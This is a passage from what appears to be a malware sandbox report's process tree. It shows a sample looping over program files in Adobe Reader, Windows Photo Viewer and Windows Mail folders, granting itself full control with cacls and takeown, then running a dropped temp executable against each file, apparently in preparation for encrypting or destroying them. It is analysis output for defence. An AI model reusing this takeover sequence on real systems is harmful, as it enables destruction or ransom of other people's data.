    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
    3⤵
    PID:872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
    3⤵
    - Modifies file permissions
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "GREEK.TXT" -nobanner
    3⤵
    PID:1176
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "GREEK.TXT" -nobanner
      4⤵
      PID:2032
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1380
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:1672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1636
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  PID:236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    PID:232
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "CP1251.TXT" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""
  2⤵
  PID:736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C
    3⤵
    PID:384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"
    3⤵
    PID:224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "eng32.clx" -nobanner
    3⤵
    PID:432
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "eng32.clx" -nobanner
      4⤵
      PID:2032
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:1140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:728
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1972
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "symbol.txt" -nobanner
    3⤵
    PID:648
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "symbol.txt" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""
  2⤵
  PID:1680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C
    3⤵
    PID:872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "ROMAN.TXT" -nobanner
    3⤵
    PID:1176
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "ROMAN.TXT" -nobanner
      4⤵
      PID:2032
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1380
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:1580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "CP1253.TXT" -nobanner
    3⤵
    PID:1248
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:652
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
  2⤵
  PID:968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
    3⤵
    PID:804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "eula.ini" -nobanner
    3⤵
    PID:748
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "eula.ini" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  PID:272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    - Modifies file permissions
    PID:872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "create_form.gif" -nobanner
    3⤵
    PID:1588
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "create_form.gif" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
  2⤵
  PID:1380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
    3⤵
    PID:596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "forms_super.gif" -nobanner
    3⤵
    PID:1896
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "forms_super.gif" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1248
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
  2⤵
  PID:1972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
    3⤵
    PID:804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "reviews_sent.gif" -nobanner
    3⤵
    PID:1160
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "reviews_sent.gif" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""
  2⤵
  PID:648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "server_lg.gif" -nobanner
    3⤵
    PID:872
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "server_lg.gif" -nobanner
      4⤵
      PID:2032
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""
  2⤵
  PID:1176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"
    3⤵
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
    3⤵
    PID:1596
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
      4⤵
      PID:652
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  PID:1248
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1580
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    PID:804
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1160
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
  2⤵
  PID:748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    3⤵
    PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "MyriadPro-Bold.otf" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C
    3⤵
    PID:272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "ZX______.PFB" -nobanner
    3⤵
    PID:596
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "ZX______.PFB" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""
  2⤵
  PID:1896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"
    3⤵
    - Modifies file permissions
    PID:1580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "brt.fca" -nobanner
    3⤵
    PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "brt.fca" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""
  2⤵
  PID:1160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"
    3⤵
    - Modifies file permissions
    PID:968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "can129.hsp" -nobanner
    3⤵
    PID:1388
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "can129.hsp" -nobanner
      4⤵
      PID:2032
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""
  2⤵
  PID:872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C
    3⤵
    PID:648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"
    3⤵
    PID:272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "usa37.hyp" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "usa37.hyp" -nobanner
      4⤵
      PID:652
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
  2⤵
  PID:1596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "CYRILLIC.TXT" -nobanner
    3⤵
    PID:1580
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "CYRILLIC.TXT" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1140
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""
  2⤵
  PID:804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C
    3⤵
    PID:1248
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "CP1250.TXT" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "CP1250.TXT" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui""
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    PID:648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:652
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui""
  2⤵
  PID:480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:452
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:232
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui""
  2⤵
  PID:804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui"
    3⤵
    PID:648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:652
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:1568
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui""
  2⤵
  PID:1508
